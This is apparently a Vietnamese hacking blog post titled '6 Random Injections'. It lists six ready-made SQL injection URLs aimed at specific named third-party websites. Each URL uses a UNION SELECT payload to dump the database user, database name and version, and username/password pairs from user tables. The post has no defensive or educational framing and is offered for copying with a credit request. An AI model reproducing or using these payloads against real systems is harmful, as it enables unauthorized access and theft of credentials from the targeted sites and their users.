6 Random Injections

1
Mã:
http://www.elansystems.co.za/product-item.php?product_items_id=-11 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username, ​0x3b,password),5,6,7,8,9,10 from users_tbl--

2/

Mã:
http://www.nbjm-sprayer.com/products.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1 ​9,20,21,22,23 from user_table--

3/

Mã:
http://www.mcdonaldlawoffice.net/story.php?articleid=-8 UNION SELECT 1,2,group_concat(name,0x3b,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from users--

4/

Mã:
http://localtime.biz/product.php?cat_id=-1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(email,0x3b, ​pwd,0x3c,0x62,0x72,0x3e),4 from users--

5/

Mã:
http://www.eltee.de/kolumnen_id.php?id=-30175 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

6/

Mã:
http://www.media4world.de/mini_d/list_art.php?shop=-5 UNION SELECT group_concat(username,0x3b,kwort,0x3b,admin,0x3c,0x62,0x72,0x3e) from user--

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's
 

0 nhận xét:

Đăng nhận xét

:) :( :)) :(( =))

Copyright © Dương-UG Blog's - Nguyễn Bình Dương